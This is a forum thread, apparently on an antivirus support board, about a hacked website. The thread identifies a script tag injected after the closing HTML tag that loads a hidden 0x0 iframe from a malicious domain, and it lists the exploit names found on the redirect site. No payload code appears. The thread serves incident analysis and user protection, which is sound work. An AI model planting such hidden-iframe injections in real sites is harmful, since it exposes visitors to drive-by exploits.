Hello, everyday i go to a page, and today avast! says that found a trojan ???
This is the page:
hxxp://www.sagastume.com/
This is the detection founded:
JS:ScriptIP-inf
I think that is a False positive cause it only detect something in that page after the today update :
If you need more information only ask me
Thanks for the help
Wepawet (alpha) - malicious
hxxp://wepawet.iseclab.org/view.php?hash=0f7dfbc7ee0ae445974788926dfb9ce7&t=1272751433&type=js
Hi Pondus,
There are some 75 variants of this malcode around
That wepawet link is giving an alert for JS-pdfka BT trojan threat aliases for Exploit.PDF-JS.Gen (v):
Alias
Detected by
Bloodhound.Exploit.196 Symantec
Exploit:Win32/Pidief.E Microsoft
VirTool:JS/Imbarligalgo.gen!A Microsoft
Virus.JS.Pdfka Ikarus
JS:Pdfka-BK Avast
Virus.JS.Pdfka!IK a-squared
JS:Pdfka-AG Avast
JS.Obfus-5 ClamAV
Troj/PDFJs-P Sophos
Exploit.PDF-JS.Gen GData
Troj/PDFJs-AH Sophos
Exploit.PDF-JS.Gen.C03 nProtect
Description here: http://www.bitdefender.com/VIRUS-1000487-en--Exploit.PDF-JS.Gen.html
Removal instructions: http://www.hkactivity.com/how-to-delete-exploit-pdf-js-gen/
Pondus, please, make the link non-clickable with hxtp or wXw
polonus
So, this is not a False Positive?
The Site was hacked?
My PC isn’t Infected right?
Thanks for the help
The Script tag outside of the closing HTML tag is against standards and as such highly suspect.
See image, the script document . write line has been broken to make it easier to see.
This script creates a 0x0 iframe tag which points to a malicious site (grepad.com) and it is this script tag and associated attempt to connect to a malicious site that causes the alert, see image2.
No it isn’t an FP.
It looks like the site was hacked.
Your system shouldn’t be infected as avast blocked it.
Hi Light Archangel,
As you were alerted by the avast shield and it disconnected from the site, you are not infected.
Malicious software includes 7 exploit(s), 4 trojan(s) on the redirect site…
To be fully protected against all malcode that could enter a browser then use a browser like Firefox with the NoScript extension and RequestPolicy extension installed to have all these issues blocked and allow only that what you need when you visit a site,
polonus
This script creates a 0x0 iframe tag which points to a malicious site (grepad.com) and it is this script tag and associated attempt to connect to a malicious site that causes the alert, see image2.
And that site have this result
Wepawet (alpha) - malicious
hxxp://wepawet.cs.ucsb.edu/view.php?hash=26dd9248f86db75afc9425b706fd85c1&t=1272216941&type=js
I’m using Firefox (Is my Default browser)
I have WOT + NoScript addons
I allowed the Scripts of that page because I went everyday to there. :
this not happened yesterday…
For that reason i thought that was a False Positive.
avast protected very well my computer Then!! ;D
My PC is fine, I have no virus since I installed avast!
Now i’ll be looking for a similar site to sagastume.com
I’ll try to warn all my friends that used that site too…
Thanks to all for your replies.
So long my friends
Hi DavidR,
What malware do we detect for the grepad.com
link hxtp://wepawet.cs.ucsb.edu/view.php?hash=26dd9248f86db75afc9425b706fd85c1&t=1272216941&type=js
I did not pass the above link directly, because avast would flag it…
Adobe util.printf overflow
Adobe getIcon
Office OCX OpenWebFile
AppStream LaunchObj
Hummingbird PerformUpdateAsync
Peachtree ExecutePreferredApplication
C6 propDownloadUrl
polonus
Yes, I tend not to get too carried away going to the next level down, etc. once it is reasonably clear that the site has been hacked/infected, etc. and the avast detection was good.
Again I try to stick with what is actually on the site (where the detection was made) if that can determine the detection is good, life is too short for detailed delving once confirmed I stop.